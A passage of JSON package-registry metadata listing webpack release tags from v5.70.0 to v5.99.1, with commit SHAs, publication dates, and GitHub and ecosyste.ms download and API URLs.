:"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed